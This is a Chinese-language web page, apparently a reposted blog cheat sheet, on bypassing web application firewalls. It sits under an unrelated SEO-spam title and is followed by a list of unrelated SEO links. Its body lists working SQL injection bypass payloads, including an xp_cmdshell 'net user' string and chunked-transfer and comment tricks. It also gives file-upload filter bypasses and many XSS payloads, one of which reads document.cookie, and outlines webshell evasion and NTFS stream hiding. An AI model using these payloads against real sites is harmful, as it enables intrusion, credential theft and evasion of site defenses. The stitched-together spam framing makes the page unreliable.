当前位置: 首页 > news >正文

建站最少需要多少钱谷歌外贸平台

建站最少需要多少钱,谷歌外贸平台,wordpress自定义参数,品牌网站建设解决方案1.市场Waf分类 硬件Waf:绿盟、安恒、启明、知道创宇等 需要选择模式 透明模式 反向代理分为反向代理(代理模式)与反向代理(牵引模式) 反向代理又分为两种模式,反向代理…

1.市场Waf分类
  

硬件Waf:绿盟、安恒、启明、知道创宇等
        需要选择模式
        透明模式
        反向代理分为反向代理(代理模式)与反向代理(牵引模式)
        反向代理又分为两种模式,反向代理(代理模式)与反向代理(牵引模式)
        旁路监控
软件Waf:安全狗、云锁、中间件自带的Waf模块
云WAF:阿里云、安全狗、知道创宇、安恒

2.WAF的检测方法
  

首先白名单黑名单身份认证--数据包解析--规则判断--拦截     

   

3.身份认证阶段绕过
    

  • 伪造搜索引擎绕过

        

  •  伪造白名单的特殊目录

        admin/../  方式绕过
        http://10.0.0.139:92/pikachu/pkxss/admin/../pkxss_login.php
         

4.数据包解析绕过
  

  •  1、burp安装waf模块

云WAF绕过方法:伪造XFF头为127.0.0.1或找出真实IP绕过 
 安装插件
          

     

              加一些路径
                                                

  • 2、通过工具伪造百度、google等user agent头或者伪造白名单特殊目录
  •  3、编码url绕过

  输入and 1=1


将and换位&&


进行url编码
                 

 

 去掉1=1


将1=1换位-1=-1


    4、修改请求方式绕过:利用waf的默认规则绕过,如默认只针对拦截,不对post拦截
        对方支持request
       为request就是可以


          

  •  5、复合参数绕过

        http://10.0.0.139:92/sql.php?id=1&id=and&id=1=2

  •     6、WAF触发规则的绕过

   内联注释代替空格/**/代替空格
     http://10.0.0.139:92/sql.php?id=1/*|%23--%23|*/and/*|%23--%23|*/-1=-1


特殊字符拼接
            例如: exec('maste'+'r..xp'+'_cmdshell'+'"net user"')
注释包含关键字
            /*!*/包含关键词
                GET /pen/news.php?id=1 /*!union*/ /*!select*/  user,password /*!from*/ mysql.user
            and /*!1*/=/*!1*/ #
                加!是被执行
            Lucy' order /*!11440 by*/ 1,2#
                跟这个数字有关,这是一个版本
            -1'  union /*!77777cz*//*!77777cz*/ select database/*!77777a*/(),2#
使用大小写
            http://www.***.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
双写绕过
            http://www.***.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
关键字替换
            xor异或绕过
            mod绕过
            = | like|in、group_concat() | concat_ws()、@@version | version()
利用WAF本身的功能绕过利用*代替空格
            ,如uni*on+sel*ect+1,2,3,4....
组合法
            and /*!1=1*/ %23
            把and为&&,urlencode后为%26%26  如:%20%26%26%20-1=-2

  •     7、分块传输绕过

 支持get 或request
  变更请求方法


 使用分块传输


 0代表传输完成

  • 8.利用其他变量或命令执行语句

      and mod(8,7) in (1)
      and mod(8,7) in (2)
       异或运算(测注入点)xor
            vince ' Xor '1'='1' #
            vince ' Xor '1'='2' #     

5.文件上传绕过
    

  • 方法一:等号绕过

        被waf拦截


 上传成功
                

  •     方法二:换行绕过

  •     方法三:填充垃圾字符

        在from-data前加一些垃圾字符
            

  •     方法四:突破0,文件名前缀加[0x09]绕过

  •         方法五:文件名去掉双引号绕过

6.XSS绕过Waf
  

  • HTML5 新标签

        <details%20open%20οntοggle=alert(/xss/)>
        <details open οntοggle=top['prompt'](1)>
          <details open οntοggle=top['al'%2b'ert'](1)>
          audio标签
            <audio src=x οnerrοr=alert(47)>
            <audio src=x οnerrοr=prompt(1);>
            <audio src=1 href=1 οnerrοr="javascript:alert(1)"></audio>
        video标签
            <video src=x οnerrοr=alert(48)>
            <video src=x οnerrοr=prompt(1);>
        div标签
            <div style="width:expression(alert(/1/))">1</div>     ie浏览器执行
            <div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv>   url编码绕过
        math标签
            <math><a/xlink:href=javascript:prompt(1)>Xss
            <math href="javascript:javascript:alert(1)">Xss</math> 
        button标签
            <button οnfοcus=alert(1) autofocus>
            <button/οnclick=alert(1) >xss</button>
            keygen/οnfοcus=prompt(1);>
        keygen标签
            <keygen οnfοcus=javascript:alert(1) autofocus>
        object标签
            <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
            base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg    <script>alert(1)</script>
        iframe标签
            <IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>
            <iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">
            <iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>

  •     大小写绕过
  •     javascript伪协议
  •     没有分号
  •     Flash
  •     Fuzz进行测试
  •     双层标签绕过 

7.Webshell免杀(服务端绕过)
    

用小马传大马(读取文件路径)
小马功能单一,大马功能多,小马代码少,小马作用就是传大码
 PHP小马
注释法(干扰waf)
 替换函数  

类函数组合法

把马创建成涵数,后面只要调用涵数就行

变量覆盖

在线加密

通过NTFS交换数据流文件实现文件隐藏

8.Webshell后门分析
    

代码分析定位法
抓包分析法
数据流量协议分析法
      

http://www.ds6.com.cn/news/16995.html

相关文章:

  • wordpress响应式网站模板下载蜘蛛seo超级外链工具
  • 淘宝客网站做好了该怎么做分享几个x站好用的关键词
  • 珠海网站设计seo的基本步骤包括哪些
  • 上海城乡住房建设部网站首页跨国网站浏览器
  • 电子商务网站运营广东省人大常委会
  • 做网站后期自己可以维护吗seo是指什么职位
  • 安庆网站制作网络营销形式
  • 常见购物网站功能手机优化什么意思
  • 做标记网站全球十大搜索引擎
  • 个人网站备案备注范文关键词优化排名要多少钱
  • 西安网站建设行业西安网站推广
  • 做网站要要多少钱网游推广
  • 芜湖市住房和城乡建设厅网站首页关键词优化公司电话
  • 如何建设独立的免费网站百度网址是多少
  • 建造网站需要多少钱网站建设山东聚搜网络
  • 做微网站的公司哪家好公司seo是什么级别
  • 宜昌市做网站的公司网站推广网站
  • 制作公司网站结构图国内手机搜索引擎十大排行
  • 网站建设总结心得优化措施最新回应
  • 上外贸网站建设附近的计算机培训班
  • 电子商务网站建设心得体会友情链接怎么互换
  • 寻找郑州网站优化公司重庆网站外包
  • 长沙网站建设外包东莞关键词优化实力乐云seo
  • 沈阳网站做百度知道官网手机版
  • 网站搭建用什么软件品牌网络营销策划方案
  • 企业信息公示查询系统官网郑州官网网站推广优化
  • 渭南市网站建设网络营销代运营外包公司
  • 贵德网站建设谷歌手机版下载安装
  • 建站平台备案网络推广怎么做效果好
  • 高端网站开发培训石家庄seo关键词